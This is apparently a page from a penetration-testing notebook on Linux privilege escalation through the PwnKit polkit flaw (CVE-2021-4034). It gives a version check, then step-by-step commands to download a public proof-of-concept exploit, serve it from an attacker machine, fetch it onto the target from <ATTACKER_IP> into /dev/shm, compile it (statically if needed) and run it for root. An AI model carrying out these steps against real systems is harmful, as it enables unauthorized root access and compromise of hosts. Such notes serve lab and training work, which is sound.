POLKIT ABUSE

PRIMARY CATEGORY → LINUX PRIVESC

CVE-2021-4034

Pwnkit

CVE-2021-4034

Affected Versions → 0.105 and lower

Enumeration

pkexec --version

Abuse

Github PoC

Setup

Downloading the exploit

From the attacker ⚔️

curl --silent --location --request GET 'https://github.com/arthepsy/CVE-2021-4034/raw/refs/heads/main/cve-2021-4034-poc.c' --output exploit.c

Transferring the file

From the attacker ⚔️

python3 -m http.server 80

From the target 🎯

cd /dev/shm && curl --silent --location --request GET 'http://<ATTACKER_IP>/exploit.c' --remote-name

Compiling the binary

gcc -o exploit ./exploit.c

chmod 700 ./exploit

If the target does not have the gcc utility available, we should compile an static binary from the attacker machine by performing an static linking to ensure maximum portability

To do so, simply run the following command to generate the static binary after cloning the Github repository

From the attacker ⚔️

gcc -static -o exploit ./exploit.c

Then, all that remains is to transfer the binary to the target and run it

Usage

./exploit

💥Cyb3rBook

Explorer

POLKIT ABUSE

PRIMARY CATEGORY → LINUX PRIVESC

CVE-2021-4034

Enumeration

Abuse

Setup

Usage

Graph View

Backlinks